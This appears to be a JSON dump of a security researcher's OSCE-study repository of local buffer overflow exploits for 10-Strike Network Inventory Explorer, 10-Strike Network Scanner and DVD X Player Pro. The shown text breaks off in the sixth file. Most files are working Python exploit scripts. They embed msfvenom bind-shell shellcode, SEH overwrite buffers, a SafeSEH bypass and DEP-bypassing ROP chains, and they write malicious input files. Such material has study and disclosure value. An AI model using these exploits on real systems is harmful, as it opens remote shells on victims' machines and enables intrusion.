[
  {
    "path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/From Text File/Exploit.py",
    "content": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------------#\r\n# Exploit Title      : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH)   #\r\n# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #\r\n# Vendor Homepage    : https://www.10-strike.com/                                                          #\r\n# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe      #\r\n# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #\r\n#----------------------------------------------------------------------------------------------------------#\r\n\r\n# Disclosure Timeline:\r\n# ====================\r\n# 06-02-18: Contacted vendor, no response \r\n# 06-03-18: Contacted vendor, no response\r\n# 06-04-18: Contacted vendor, no response\r\n# 06-05-18: Proof of concept exploit published \r\n\r\n'''\r\nSteps to reproduce:\r\n===================\r\n - Under Computers tab click on 'From Text File'\r\n - Open Evil.txt and boom!\r\nNotes:\r\n======\r\n - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]\r\n - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting \r\n   the stack by 8 bytes, see buffer for reference.\r\n - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on \r\n   your username, the following is the path used while developing the exploit (default on Windows 7): \r\n   [C:\\Users\\IEUser\\AppData\\Roaming\\10-strike\\Network Inventory\\cfg\\]\r\n - Pro edition is effected as well.   
\r\n'''\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d\\x3a\\x5c' -f python -v shellcode\r\n#Payload size: 355 bytes\r\nshellcode =  \"\"\r\nshellcode += \"\\xba\\x58\\x39\\xb1\\xae\\xd9\\xcf\\xd9\\x74\\x24\\xf4\\x5f\"\r\nshellcode += \"\\x29\\xc9\\xb1\\x53\\x83\\xef\\xfc\\x31\\x57\\x0e\\x03\\x0f\"\r\nshellcode += \"\\x37\\x53\\x5b\\x53\\xaf\\x11\\xa4\\xab\\x30\\x76\\x2c\\x4e\"\r\nshellcode += \"\\x01\\xb6\\x4a\\x1b\\x32\\x06\\x18\\x49\\xbf\\xed\\x4c\\x79\"\r\nshellcode += \"\\x34\\x83\\x58\\x8e\\xfd\\x2e\\xbf\\xa1\\xfe\\x03\\x83\\xa0\"\r\nshellcode += \"\\x7c\\x5e\\xd0\\x02\\xbc\\x91\\x25\\x43\\xf9\\xcc\\xc4\\x11\"\r\nshellcode += \"\\x52\\x9a\\x7b\\x85\\xd7\\xd6\\x47\\x2e\\xab\\xf7\\xcf\\xd3\"\r\nshellcode += \"\\x7c\\xf9\\xfe\\x42\\xf6\\xa0\\x20\\x65\\xdb\\xd8\\x68\\x7d\"\r\nshellcode += \"\\x38\\xe4\\x23\\xf6\\x8a\\x92\\xb5\\xde\\xc2\\x5b\\x19\\x1f\"\r\nshellcode += \"\\xeb\\xa9\\x63\\x58\\xcc\\x51\\x16\\x90\\x2e\\xef\\x21\\x67\"\r\nshellcode += \"\\x4c\\x2b\\xa7\\x73\\xf6\\xb8\\x1f\\x5f\\x06\\x6c\\xf9\\x14\"\r\nshellcode += \"\\x04\\xd9\\x8d\\x72\\x09\\xdc\\x42\\x09\\x35\\x55\\x65\\xdd\"\r\nshellcode += \"\\xbf\\x2d\\x42\\xf9\\xe4\\xf6\\xeb\\x58\\x41\\x58\\x13\\xba\"\r\nshellcode += \"\\x2a\\x05\\xb1\\xb1\\xc7\\x52\\xc8\\x98\\x8f\\x97\\xe1\\x22\"\r\nshellcode += \"\\x50\\xb0\\x72\\x51\\x62\\x1f\\x29\\xfd\\xce\\xe8\\xf7\\xfa\"\r\nshellcode += \"\\x31\\xc3\\x40\\x94\\xcf\\xec\\xb0\\xbd\\x0b\\xb8\\xe0\\xd5\"\r\nshellcode += \"\\xba\\xc1\\x6a\\x25\\x42\\x14\\x06\\x2d\\xe5\\xc7\\x35\\xd0\"\r\nshellcode += \"\\x55\\xb8\\xf9\\x7a\\x3e\\xd2\\xf5\\xa5\\x5e\\xdd\\xdf\\xce\"\r\nshellcode += \"\\xf7\\x20\\xe0\\xe1\\x5b\\xac\\x06\\x6b\\x74\\xf8\\x91\\x03\"\r\nshellcode += \"\\xb6\\xdf\\x29\\xb4\\xc9\\x35\\x02\\x52\\x81\\x5f\\x95\\x5d\"\r\nshellcode += \"\\x12\\x4a\\xb1\\xc9\\x99\\x99\\x05\\xe8\\x9d\\xb7\\x2d\\x7d\"\r\nshellcode += \"\\x09\\x4d\\xbc\\xcc\\xab\\x52\\x95\\xa6\\x48\\xc0\\x72\\x36\"\r\nshellcode += 
\"\\x06\\xf9\\x2c\\x61\\x4f\\xcf\\x24\\xe7\\x7d\\x76\\x9f\\x15\"\r\nshellcode += \"\\x7c\\xee\\xd8\\x9d\\x5b\\xd3\\xe7\\x1c\\x29\\x6f\\xcc\\x0e\"\r\nshellcode += \"\\xf7\\x70\\x48\\x7a\\xa7\\x26\\x06\\xd4\\x01\\x91\\xe8\\x8e\"\r\nshellcode += \"\\xdb\\x4e\\xa3\\x46\\x9d\\xbc\\x74\\x10\\xa2\\xe8\\x02\\xfc\"\r\nshellcode += \"\\x13\\x45\\x53\\x03\\x9b\\x01\\x53\\x7c\\xc1\\xb1\\x9c\\x57\"\r\nshellcode += \"\\x41\\xc1\\xd6\\xf5\\xe0\\x4a\\xbf\\x6c\\xb1\\x16\\x40\\x5b\"\r\nshellcode += \"\\xf6\\x2e\\xc3\\x69\\x87\\xd4\\xdb\\x18\\x82\\x91\\x5b\\xf1\"\r\nshellcode += \"\\xfe\\x8a\\x09\\xf5\\xad\\xab\\x1b\"\r\n\r\nbuffer  = '\\x41' * 207                           # filler to nSEH offset (211-4)\r\nbuffer += '\\x9f\\x4e\\xe9\\x61'                     # 0x61E94E9F [sqlite3.dll] | jmp esp\r\nbuffer += '\\x90\\x90\\x90\\x90'                     # nSEH\r\nbuffer += '\\x90\\x90\\x90\\x90'                     # SEH \r\nbuffer += shellcode                              # bind shell \r\nbuffer += '\\xcc' * (3000-207-12-len(shellcode))  # junk \r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e"
  },
  {
    "path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/README.md",
    "content": "### 10-Strike Network Inventory Explorer 8.54\nStructured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the links [EDB-ID: 44841](https://www.exploit-db.com/exploits/44838/) and [EDB-ID: 44840](https://www.exploit-db.com/exploits/44840/)\n\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkInventoryExplorerv8.54/From%20Text%20File/PoC.gif\">\n</p>\n"
  },
  {
    "path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/Registration Key/Exploit.py",
    "content": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------------#\r\n# Exploit Title      : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH)   #\r\n# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #\r\n# Vendor Homepage    : https://www.10-strike.com/                                                          #\r\n# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe      #\r\n# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #\r\n#----------------------------------------------------------------------------------------------------------#\r\n\r\n# Disclosure Timeline:\r\n# ====================\r\n# 06-02-18: Contacted vendor, no response \r\n# 06-03-18: Contacted vendor, no response\r\n# 06-04-18: Contacted vendor, no response\r\n# 06-05-18: Proof of concept exploit published \r\n\r\n'''\r\nSteps to reproduce:\r\n===================\r\n - Under Help, click 'Enter Registration Key'.  
\r\n - Paste the contents of Evil.txt and click OK.\r\nNotes:\r\n======\r\n - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]\r\n - There is ample space prior to SEH overwrite.\r\n - Pro edition is effected as well.\r\n'''\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -f python -v shellcode\r\n#Payload size: 355 bytes\r\nshellcode =  \"\"\r\nshellcode += \"\\xbf\\xad\\xa8\\x1e\\x44\\xdd\\xc0\\xd9\\x74\\x24\\xf4\\x5e\"\r\nshellcode += \"\\x2b\\xc9\\xb1\\x53\\x83\\xc6\\x04\\x31\\x7e\\x0e\\x03\\xd3\"\r\nshellcode += \"\\xa6\\xfc\\xb1\\xd7\\x5f\\x82\\x3a\\x27\\xa0\\xe3\\xb3\\xc2\"\r\nshellcode += \"\\x91\\x23\\xa7\\x87\\x82\\x93\\xa3\\xc5\\x2e\\x5f\\xe1\\xfd\"\r\nshellcode += \"\\xa5\\x2d\\x2e\\xf2\\x0e\\x9b\\x08\\x3d\\x8e\\xb0\\x69\\x5c\"\r\nshellcode += \"\\x0c\\xcb\\xbd\\xbe\\x2d\\x04\\xb0\\xbf\\x6a\\x79\\x39\\xed\"\r\nshellcode += \"\\x23\\xf5\\xec\\x01\\x47\\x43\\x2d\\xaa\\x1b\\x45\\x35\\x4f\"\r\nshellcode += \"\\xeb\\x64\\x14\\xde\\x67\\x3f\\xb6\\xe1\\xa4\\x4b\\xff\\xf9\"\r\nshellcode += \"\\xa9\\x76\\x49\\x72\\x19\\x0c\\x48\\x52\\x53\\xed\\xe7\\x9b\"\r\nshellcode += \"\\x5b\\x1c\\xf9\\xdc\\x5c\\xff\\x8c\\x14\\x9f\\x82\\x96\\xe3\"\r\nshellcode += \"\\xdd\\x58\\x12\\xf7\\x46\\x2a\\x84\\xd3\\x77\\xff\\x53\\x90\"\r\nshellcode += \"\\x74\\xb4\\x10\\xfe\\x98\\x4b\\xf4\\x75\\xa4\\xc0\\xfb\\x59\"\r\nshellcode += \"\\x2c\\x92\\xdf\\x7d\\x74\\x40\\x41\\x24\\xd0\\x27\\x7e\\x36\"\r\nshellcode += \"\\xbb\\x98\\xda\\x3d\\x56\\xcc\\x56\\x1c\\x3f\\x21\\x5b\\x9e\"\r\nshellcode += \"\\xbf\\x2d\\xec\\xed\\x8d\\xf2\\x46\\x79\\xbe\\x7b\\x41\\x7e\"\r\nshellcode += \"\\xc1\\x51\\x35\\x10\\x3c\\x5a\\x46\\x39\\xfb\\x0e\\x16\\x51\"\r\nshellcode += \"\\x2a\\x2f\\xfd\\xa1\\xd3\\xfa\\x68\\xa9\\x72\\x55\\x8f\\x54\"\r\nshellcode += \"\\xc4\\x05\\x0f\\xf6\\xad\\x4f\\x80\\x29\\xcd\\x6f\\x4a\\x42\"\r\nshellcode += \"\\x66\\x92\\x75\\x7d\\x2b\\x1b\\x93\\x17\\xc3\\x4d\\x0b\\x8f\"\r\nshellcode += 
\"\\x21\\xaa\\x84\\x28\\x59\\x98\\xbc\\xde\\x12\\xca\\x7b\\xe1\"\r\nshellcode += \"\\xa2\\xd8\\x2b\\x75\\x29\\x0f\\xe8\\x64\\x2e\\x1a\\x58\\xf1\"\r\nshellcode += \"\\xb9\\xd0\\x09\\xb0\\x58\\xe4\\x03\\x22\\xf8\\x77\\xc8\\xb2\"\r\nshellcode += \"\\x77\\x64\\x47\\xe5\\xd0\\x5a\\x9e\\x63\\xcd\\xc5\\x08\\x91\"\r\nshellcode += \"\\x0c\\x93\\x73\\x11\\xcb\\x60\\x7d\\x98\\x9e\\xdd\\x59\\x8a\"\r\nshellcode += \"\\x66\\xdd\\xe5\\xfe\\x36\\x88\\xb3\\xa8\\xf0\\x62\\x72\\x02\"\r\nshellcode += \"\\xab\\xd9\\xdc\\xc2\\x2a\\x12\\xdf\\x94\\x32\\x7f\\xa9\\x78\"\r\nshellcode += \"\\x82\\xd6\\xec\\x87\\x2b\\xbf\\xf8\\xf0\\x51\\x5f\\x06\\x2b\"\r\nshellcode += \"\\xd2\\x6f\\x4d\\x71\\x73\\xf8\\x08\\xe0\\xc1\\x65\\xab\\xdf\"\r\nshellcode += \"\\x06\\x90\\x28\\xd5\\xf6\\x67\\x30\\x9c\\xf3\\x2c\\xf6\\x4d\"\r\nshellcode += \"\\x8e\\x3d\\x93\\x71\\x3d\\x3d\\xb6\"\r\n\r\nbuffer  = '\\x41' * 4188                                # filler to nSEH\r\nbuffer += '\\x75\\x06\\x74\\x06'                           # nSEH | jump net\r\nbuffer += '\\x7a\\x49\\xe8\\x61'                           # SEH  | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]\r\nbuffer += '\\x90' * 8                                   # nops\r\nbuffer += shellcode                                    # bind shell\r\nbuffer += '\\x41' * (5000-4188-16-len(shellcode))       # junk\r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e"
  },
  {
    "path": "Local Buffer Overflow/10-StrikeNetworkScannerv3.0/Exploit.py",
    "content": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------------#\r\n# Exploit Title      : 10-Strike Network Scanner v3.0 - Local Buffer Overflow (SEH)                        #\r\n# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #\r\n# Vendor Homepage    : https://www.10-strike.com/                                                          #\r\n# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe                       #\r\n# Tested on          : Windows XP Professional - SP3 (x86)                                                 #\r\n#----------------------------------------------------------------------------------------------------------#\r\n\r\n# Disclosure Timeline:\r\n# ====================\r\n# 06-02-18: Contacted vendor, no response \r\n# 06-03-18: Contacted vendor, no response\r\n# 06-04-18: Contacted vendor, no response\r\n# 06-05-18: Proof of concept exploit published \r\n\r\n'''\r\nSteps to reproduce:\r\n===================\r\n - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.\r\n - Right-click on newly created host and click 'Trace route...'.\r\n - Repeat the second step and boom.\r\nNotes:\r\n======\r\n - '\\x00' get converted to '\\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.\r\n - All loaded modules are compiled with /SafeSEH.\r\n - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different\r\n   offsets and buffer size.\r\n'''\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -v shellcode -f python\r\n#Payload size: 355 bytes\r\nshellcode =  \"\"\r\nshellcode += \"\\xb8\\x2b\\x29\\xa7\\x48\\xd9\\xe8\\xd9\\x74\\x24\\xf4\\x5b\"\r\nshellcode += 
\"\\x29\\xc9\\xb1\\x53\\x31\\x43\\x12\\x03\\x43\\x12\\x83\\xc0\"\r\nshellcode += \"\\xd5\\x45\\xbd\\xea\\xce\\x08\\x3e\\x12\\x0f\\x6d\\xb6\\xf7\"\r\nshellcode += \"\\x3e\\xad\\xac\\x7c\\x10\\x1d\\xa6\\xd0\\x9d\\xd6\\xea\\xc0\"\r\nshellcode += \"\\x16\\x9a\\x22\\xe7\\x9f\\x11\\x15\\xc6\\x20\\x09\\x65\\x49\"\r\nshellcode += \"\\xa3\\x50\\xba\\xa9\\x9a\\x9a\\xcf\\xa8\\xdb\\xc7\\x22\\xf8\"\r\nshellcode += \"\\xb4\\x8c\\x91\\xec\\xb1\\xd9\\x29\\x87\\x8a\\xcc\\x29\\x74\"\r\nshellcode += \"\\x5a\\xee\\x18\\x2b\\xd0\\xa9\\xba\\xca\\x35\\xc2\\xf2\\xd4\"\r\nshellcode += \"\\x5a\\xef\\x4d\\x6f\\xa8\\x9b\\x4f\\xb9\\xe0\\x64\\xe3\\x84\"\r\nshellcode += \"\\xcc\\x96\\xfd\\xc1\\xeb\\x48\\x88\\x3b\\x08\\xf4\\x8b\\xf8\"\r\nshellcode += \"\\x72\\x22\\x19\\x1a\\xd4\\xa1\\xb9\\xc6\\xe4\\x66\\x5f\\x8d\"\r\nshellcode += \"\\xeb\\xc3\\x2b\\xc9\\xef\\xd2\\xf8\\x62\\x0b\\x5e\\xff\\xa4\"\r\nshellcode += \"\\x9d\\x24\\x24\\x60\\xc5\\xff\\x45\\x31\\xa3\\xae\\x7a\\x21\"\r\nshellcode += \"\\x0c\\x0e\\xdf\\x2a\\xa1\\x5b\\x52\\x71\\xae\\xa8\\x5f\\x89\"\r\nshellcode += \"\\x2e\\xa7\\xe8\\xfa\\x1c\\x68\\x43\\x94\\x2c\\xe1\\x4d\\x63\"\r\nshellcode += \"\\x52\\xd8\\x2a\\xfb\\xad\\xe3\\x4a\\xd2\\x69\\xb7\\x1a\\x4c\"\r\nshellcode += \"\\x5b\\xb8\\xf0\\x8c\\x64\\x6d\\x6c\\x84\\xc3\\xde\\x93\\x69\"\r\nshellcode += \"\\xb3\\x8e\\x13\\xc1\\x5c\\xc5\\x9b\\x3e\\x7c\\xe6\\x71\\x57\"\r\nshellcode += \"\\x15\\x1b\\x7a\\x46\\xba\\x92\\x9c\\x02\\x52\\xf3\\x37\\xba\"\r\nshellcode += \"\\x90\\x20\\x80\\x5d\\xea\\x02\\xb8\\xc9\\xa3\\x44\\x7f\\xf6\"\r\nshellcode += \"\\x33\\x43\\xd7\\x60\\xb8\\x80\\xe3\\x91\\xbf\\x8c\\x43\\xc6\"\r\nshellcode += \"\\x28\\x5a\\x02\\xa5\\xc9\\x5b\\x0f\\x5d\\x69\\xc9\\xd4\\x9d\"\r\nshellcode += \"\\xe4\\xf2\\x42\\xca\\xa1\\xc5\\x9a\\x9e\\x5f\\x7f\\x35\\xbc\"\r\nshellcode += \"\\x9d\\x19\\x7e\\x04\\x7a\\xda\\x81\\x85\\x0f\\x66\\xa6\\x95\"\r\nshellcode += \"\\xc9\\x67\\xe2\\xc1\\x85\\x31\\xbc\\xbf\\x63\\xe8\\x0e\\x69\"\r\nshellcode += 
\"\\x3a\\x47\\xd9\\xfd\\xbb\\xab\\xda\\x7b\\xc4\\xe1\\xac\\x63\"\r\nshellcode += \"\\x75\\x5c\\xe9\\x9c\\xba\\x08\\xfd\\xe5\\xa6\\xa8\\x02\\x3c\"\r\nshellcode += \"\\x63\\xd8\\x48\\x1c\\xc2\\x71\\x15\\xf5\\x56\\x1c\\xa6\\x20\"\r\nshellcode += \"\\x94\\x19\\x25\\xc0\\x65\\xde\\x35\\xa1\\x60\\x9a\\xf1\\x5a\"\r\nshellcode += \"\\x19\\xb3\\x97\\x5c\\x8e\\xb4\\xbd\"\r\n\r\nmagic  = '\\xd9\\xee'                             # fldz\r\nmagic += '\\xd9\\x74\\x24\\xf4'                     # fnstenv [esp-0xc]\r\nmagic += '\\x59'                                 # pop ecx\r\nmagic += '\\x80\\xc1\\x05'                         # add cl,0x5\r\nmagic += '\\x80\\xc1\\x05'                         # add cl,0x5\r\nmagic += '\\x90'                                 # nop\r\nmagic += '\\xfe\\xcd'                             # dec ch\r\nmagic += '\\xfe\\xcd'                             # dec ch\r\nmagic += '\\xff\\xe1'                             # jmp ecx \r\n\r\nbuffer  = '\\x90' * 28                           # nops\r\nbuffer += shellcode                             # bind shell\r\nbuffer += '\\xcc' * (516-28-len(shellcode))      # filler to nSEH \r\nbuffer += '\\x75\\x06\\x74\\x06'                    # nSEH | jump net\r\nbuffer += '\\x18\\x05\\xfc\\x7f'                    # SEH  | 0x7ffc0518 : pop edi # pop edi # ret  [SafeSEH Bypass]\r\nbuffer += '\\x90' * 5                            # nops \r\nbuffer += magic                                 # jump -512\r\nbuffer += '\\xcc' * (3000-516-4-4-5-len(magic))  # junk\r\n\r\ntry:\r\n\tf=open(\"Evil.txt\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e"
  },
  {
    "path": "Local Buffer Overflow/10-StrikeNetworkScannerv3.0/README.md",
    "content": "### 10-Strike Network Scanner v3.0\nStructured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44841/)\n\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkScannerv3.0/PoC.gif\">\n</p>\n"
  },
  {
    "path": "Local Buffer Overflow/DVDXPlayerProv5.5/VirtualAlloc()/Exploit.py",
    "content": "#!/usr/bin/env python\n\nimport struct\nimport time\n\n# bad characters \"\\x00\\x0a\\x0d\\x1a\\x20\"\n\nshellcode  = \"\"\nshellcode += \"\\xba\\xad\\xe1\\xd9\\x21\\xda\\xd8\\xd9\\x74\\x24\\xf4\\x5e\\x33\"\nshellcode += \"\\xc9\\xb1\\x31\\x83\\xee\\xfc\\x31\\x56\\x0f\\x03\\x56\\xa2\\x03\"\nshellcode += \"\\x2c\\xdd\\x54\\x41\\xcf\\x1e\\xa4\\x26\\x59\\xfb\\x95\\x66\\x3d\"\nshellcode += \"\\x8f\\x85\\x56\\x35\\xdd\\x29\\x1c\\x1b\\xf6\\xba\\x50\\xb4\\xf9\"\nshellcode += \"\\x0b\\xde\\xe2\\x34\\x8c\\x73\\xd6\\x57\\x0e\\x8e\\x0b\\xb8\\x2f\"\nshellcode += \"\\x41\\x5e\\xb9\\x68\\xbc\\x93\\xeb\\x21\\xca\\x06\\x1c\\x46\\x86\"\nshellcode += \"\\x9a\\x97\\x14\\x06\\x9b\\x44\\xec\\x29\\x8a\\xda\\x67\\x70\\x0c\"\nshellcode += \"\\xdc\\xa4\\x08\\x05\\xc6\\xa9\\x35\\xdf\\x7d\\x19\\xc1\\xde\\x57\"\nshellcode += \"\\x50\\x2a\\x4c\\x96\\x5d\\xd9\\x8c\\xde\\x59\\x02\\xfb\\x16\\x9a\"\nshellcode += \"\\xbf\\xfc\\xec\\xe1\\x1b\\x88\\xf6\\x41\\xef\\x2a\\xd3\\x70\\x3c\"\nshellcode += \"\\xac\\x90\\x7e\\x89\\xba\\xff\\x62\\x0c\\x6e\\x74\\x9e\\x85\\x91\"\nshellcode += \"\\x5b\\x17\\xdd\\xb5\\x7f\\x7c\\x85\\xd4\\x26\\xd8\\x68\\xe8\\x39\"\nshellcode += \"\\x83\\xd5\\x4c\\x31\\x29\\x01\\xfd\\x18\\x27\\xd4\\x73\\x27\\x05\"\nshellcode += \"\\xd6\\x8b\\x28\\x39\\xbf\\xba\\xa3\\xd6\\xb8\\x42\\x66\\x93\\x37\"\nshellcode += \"\\x09\\x2b\\xb5\\xdf\\xd4\\xb9\\x84\\xbd\\xe6\\x17\\xca\\xbb\\x64\"\nshellcode += \"\\x92\\xb2\\x3f\\x74\\xd7\\xb7\\x04\\x32\\x0b\\xc5\\x15\\xd7\\x2b\"\nshellcode += \"\\x7a\\x15\\xf2\\x4f\\x1d\\x85\\x9e\\xa1\\xb8\\x2d\\x04\\xbe\"\n\nbuffer  = \"\\x41\" * 260                      # eip offset\n\n#----------------------------------------#\n# ROP Chain setup for VirtualAlloc()     #\n#----------------------------------------#\n# EAX = NOP (0x90909090)                 #\n# ECX = flProtect (0x40)                 #\n# EDX = flAllocationType (0x1000)        #\n# EBX = dwSize                           #\n# ESP = lpAddress (automatic)            #\n# EBP = ReturnTo 
(ptr to jmp esp)        # \n# ESI = ptr to VirtualAlloc()            #\n# EDI = ROP NOP (RETN)                   #\n#----------------------------------------#\n \nbuffer += struct.pack('<L', 0x6033cda2)      # POP EAX # RETN [Configuration.dll] \nbuffer += \"MMMM\"                             # compensate (filler)\nbuffer += \"MMMM\"                             # compensate (filler)\nbuffer += \"WWWW\"                             # compensate (filler)\nbuffer += \"WWWW\"                             # compensate (filler)\nbuffer += struct.pack('<L', 0x603662fc)      # ptr to &VirtualAlloc() [IAT Configuration.dll]\nbuffer += struct.pack('<L', 0x6410b24d)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll] \nbuffer += struct.pack('<L', 0x616385d8)      # XCHG EAX,ESI # RETN 0x00 [EPG.dll] \nbuffer += struct.pack('<L', 0x61626545)      # POP EBP # RETN [EPG.dll] \nbuffer += struct.pack('<L', 0x6035453b)      # & push esp # ret 0x10 [Configuration.dll]\nbuffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501\nbuffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0x61640124)      # XCHG EAX,EBX # RETN [EPG.dll] \nbuffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0xffffffc0)      # value to negate, will become 0x00000040\nbuffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0x60366fe4)      # XCHG EAX,ECX # RETN [Configuration.dll]\nbuffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0xffffefff)      # value to negate, will become 0x00001000\nbuffer += struct.pack('<L', 0x61628105)      # INC EAX # RETN [EPG.dll]\nbuffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += 
struct.pack('<L', 0x61608ba2)      # XCHG EAX,EDX # RETN [EPG.dll]\nbuffer += struct.pack('<L', 0x6162c3b0)      # POP EDI # RETN [EPG.dll] \nbuffer += struct.pack('<L', 0x64041804)      # RETN (ROP NOP) [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0x640390d3)      # POP EAX # RETN [MediaPlayerCtrl.dll] \nbuffer += struct.pack('<L', 0x90909090)      # NOP\nbuffer += struct.pack('<L', 0x60358d9f)      # PUSHAD # RETN [Configuration.dll]\n \nbuffer += \"\\x90\" * 20\nbuffer += shellcode\nbuffer += \"\\x90\" * 20\nbuffer += \"\\x43\" * (1500-260-(4*28)-40-len(shellcode))\n\ntry:\n\tf=open(\"OpenMe.plf\",\"w\")\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\n\ttime.sleep(1)\n\tf.write(buffer)\n\tf.close()\n\tprint \"[+] File created. Load that shit up!\"\nexcept:\n\tprint \"File cannot be created\""
  },
  {
    "path": "Local Buffer Overflow/DVDXPlayerProv5.5/VirtualProtect()/Exploit.py",
    "content": "#!/usr/bin/env python\n\nimport struct\nimport time\n\n# bad characters \"\\x00\\x0a\\x0d\\x1a\\x20\"\n\nshellcode  = \"\"\nshellcode += \"\\xba\\xad\\xe1\\xd9\\x21\\xda\\xd8\\xd9\\x74\\x24\\xf4\\x5e\\x33\"\nshellcode += \"\\xc9\\xb1\\x31\\x83\\xee\\xfc\\x31\\x56\\x0f\\x03\\x56\\xa2\\x03\"\nshellcode += \"\\x2c\\xdd\\x54\\x41\\xcf\\x1e\\xa4\\x26\\x59\\xfb\\x95\\x66\\x3d\"\nshellcode += \"\\x8f\\x85\\x56\\x35\\xdd\\x29\\x1c\\x1b\\xf6\\xba\\x50\\xb4\\xf9\"\nshellcode += \"\\x0b\\xde\\xe2\\x34\\x8c\\x73\\xd6\\x57\\x0e\\x8e\\x0b\\xb8\\x2f\"\nshellcode += \"\\x41\\x5e\\xb9\\x68\\xbc\\x93\\xeb\\x21\\xca\\x06\\x1c\\x46\\x86\"\nshellcode += \"\\x9a\\x97\\x14\\x06\\x9b\\x44\\xec\\x29\\x8a\\xda\\x67\\x70\\x0c\"\nshellcode += \"\\xdc\\xa4\\x08\\x05\\xc6\\xa9\\x35\\xdf\\x7d\\x19\\xc1\\xde\\x57\"\nshellcode += \"\\x50\\x2a\\x4c\\x96\\x5d\\xd9\\x8c\\xde\\x59\\x02\\xfb\\x16\\x9a\"\nshellcode += \"\\xbf\\xfc\\xec\\xe1\\x1b\\x88\\xf6\\x41\\xef\\x2a\\xd3\\x70\\x3c\"\nshellcode += \"\\xac\\x90\\x7e\\x89\\xba\\xff\\x62\\x0c\\x6e\\x74\\x9e\\x85\\x91\"\nshellcode += \"\\x5b\\x17\\xdd\\xb5\\x7f\\x7c\\x85\\xd4\\x26\\xd8\\x68\\xe8\\x39\"\nshellcode += \"\\x83\\xd5\\x4c\\x31\\x29\\x01\\xfd\\x18\\x27\\xd4\\x73\\x27\\x05\"\nshellcode += \"\\xd6\\x8b\\x28\\x39\\xbf\\xba\\xa3\\xd6\\xb8\\x42\\x66\\x93\\x37\"\nshellcode += \"\\x09\\x2b\\xb5\\xdf\\xd4\\xb9\\x84\\xbd\\xe6\\x17\\xca\\xbb\\x64\"\nshellcode += \"\\x92\\xb2\\x3f\\x74\\xd7\\xb7\\x04\\x32\\x0b\\xc5\\x15\\xd7\\x2b\"\nshellcode += \"\\x7a\\x15\\xf2\\x4f\\x1d\\x85\\x9e\\xa1\\xb8\\x2d\\x04\\xbe\"\n\nbuffer  = \"\\x41\" * 260                      # eip offset\n\n#----------------------------------------#\n# ROP Chain setup for VirtualProtect()   #\n#----------------------------------------#\n# EAX = NOP (0x90909090)                 #\n# ECX = lpOldProtect (ptr to W address)  #\n# EDX = NewProtect (0x40)                #\n# EBX = dwSize                           #\n# ESP = lPAddress (automatic)            #\n# EBP = ReturnTo 
